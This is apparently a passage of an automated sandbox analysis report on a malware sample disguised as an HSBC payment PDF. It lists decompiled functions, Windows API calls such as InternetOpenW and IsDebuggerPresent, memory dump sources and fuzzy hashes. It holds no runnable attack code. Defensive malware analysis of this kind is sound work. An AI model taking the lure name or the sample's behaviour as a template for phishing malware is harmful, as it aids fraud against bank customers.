                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 00462A22
                                                                                                                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00462A41
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoItemMenu_memset
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 2223754486-4108050209
                                                                                                                                                    • Opcode ID: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
                                                                                                                                                    • Instruction ID: fa89ad59b694463807a05e008f151e0ce3f2ba89f6cc59c0a4ca2f54b8788f6f
                                                                                                                                                    • Opcode Fuzzy Hash: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
                                                                                                                                                    • Instruction Fuzzy Hash: EA11B172A01915BACB30DA98DA44BDF73A8AB45304F044027E855B7290E7F8AD0AC79A
                                                                                                                                                    Function 004721D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0047222C
                                                                                                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00472255
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Internet$OpenOption
                                                                                                                                                    • String ID: <local>
                                                                                                                                                    • API String ID: 942729171-4266983199
                                                                                                                                                    • Opcode ID: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
                                                                                                                                                    • Instruction ID: 87a968fd796eb7ebd351e14a87864fbf4782faaabfad8c695b3487e96fec79d3
                                                                                                                                                    • Opcode Fuzzy Hash: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
                                                                                                                                                    • Instruction Fuzzy Hash: 2C113270101221BADB248F118D84EFBFBACFF0A351F10C66BF90892200D2B49881D6F9
                                                                                                                                                    Function 00458E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                      • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00458E73
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassMessageNameSend_memmove
                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                    • API String ID: 372448540-1403004172
                                                                                                                                                    • Opcode ID: 5f835d864d1f62cb0e419e0b79a000cfa6bcf93be05798d2294fd29a5aacd538
                                                                                                                                                    • Instruction ID: b8e2c670fbb7cccfe9550cd9997642be974785ccb83f9afd7f496d9e06e76b61
                                                                                                                                                    • Opcode Fuzzy Hash: 5f835d864d1f62cb0e419e0b79a000cfa6bcf93be05798d2294fd29a5aacd538
                                                                                                                                                    • Instruction Fuzzy Hash: 4001F971601118ABCF14FBA1CC429FE7368EF01320B100A2FBC25772D2DE39580CC655
                                                                                                                                                    Function 00458CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                      • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00458D6B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassMessageNameSend_memmove
                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                    • API String ID: 372448540-1403004172
                                                                                                                                                    • Opcode ID: cab40d2aaf23e91ff59439cc1de985c2b62d93c46401826af07ce28494d0c59f
                                                                                                                                                    • Instruction ID: f717951ca8db0a39ae808ededaa33f35f94e61068a96ac8ac9a889606be0a7e6
                                                                                                                                                    • Opcode Fuzzy Hash: cab40d2aaf23e91ff59439cc1de985c2b62d93c46401826af07ce28494d0c59f
                                                                                                                                                    • Instruction Fuzzy Hash: 1701B1B1A41108ABCF14EBA1C952AFF73A8DF15341F10042FB805772D2DE285E0CD67A
                                                                                                                                                    Function 00458D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                      • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00458DEE
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassMessageNameSend_memmove
                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                    • API String ID: 372448540-1403004172
                                                                                                                                                    • Opcode ID: 50b9cba7b0b8ee41486070134dd84a018c343db3f4f48e35959f50274b6977a3
                                                                                                                                                    • Instruction ID: a21a4701c09283d063fe79b367182633aa51a9950eb7d0e2c1ab54a0e2954309
                                                                                                                                                    • Opcode Fuzzy Hash: 50b9cba7b0b8ee41486070134dd84a018c343db3f4f48e35959f50274b6977a3
                                                                                                                                                    • Instruction Fuzzy Hash: 36018FB1A41109ABDB11EAA5C942AFF77A8DF11301F20052FBC05732D3DE295E1DD67A
                                                                                                                                                    Function 0045C4EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0045C534
                                                                                                                                                      • Part of subcall function 0045C816: _memmove.LIBCMT ref: 0045C860
                                                                                                                                                      • Part of subcall function 0045C816: VariantInit.OLEAUT32(00000000), ref: 0045C882
                                                                                                                                                      • Part of subcall function 0045C816: VariantCopy.OLEAUT32(00000000,?), ref: 0045C88C
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0045C556
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Variant$Init$ClearCopy_memmove
                                                                                                                                                    • String ID: d}K
                                                                                                                                                    • API String ID: 2932060187-3405784397
                                                                                                                                                    • Opcode ID: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
                                                                                                                                                    • Instruction ID: 9b6b4eac42ae89553be157e2085c7612e92dc5081679660b2cee5bd476f3b436
                                                                                                                                                    • Opcode Fuzzy Hash: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
                                                                                                                                                    • Instruction Fuzzy Hash: 401130B18007089FC710DFAAC8C089AF7F8FF18314B50852FE58AD7612E734AA48CB54
                                                                                                                                                    Function 00464F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassName_wcscmp
                                                                                                                                                    • String ID: #32770
                                                                                                                                                    • API String ID: 2292705959-463685578
                                                                                                                                                    • Opcode ID: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
                                                                                                                                                    • Instruction ID: c10ae28a8aa268df33283df1156ce4f732750d60ee08a51e76ed462bd539b068
                                                                                                                                                    • Opcode Fuzzy Hash: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
                                                                                                                                                    • Instruction Fuzzy Hash: 91E0D13260023837E7209B55AC45FA7F7ACDB55B71F11006BFD04D3151D5649A45C7E5
                                                                                                                                                    Function 0043B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0043B314: _memset.LIBCMT ref: 0043B321
                                                                                                                                                      • Part of subcall function 00420940: InitializeCriticalSectionAndSpinCount.KERNEL32(004C4158,00000000,004C4144,0043B2F0,?,?,?,0040100A), ref: 00420945
                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,0040100A), ref: 0043B2F4
                                                                                                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0040100A), ref: 0043B303
                                                                                                                                                    Strings
                                                                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0043B2FE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                    • API String ID: 3158253471-631824599
                                                                                                                                                    • Opcode ID: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
                                                                                                                                                    • Instruction ID: 2b780658d3da49ad9f9e4503d56df9c93059da648c8d5ac8478d33f484e7c10e
                                                                                                                                                    • Opcode Fuzzy Hash: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
                                                                                                                                                    • Instruction Fuzzy Hash: 02E06DB02007208BD720AF29E5047467AE4EF14308F00897EE856C7341EBB8E488CBA9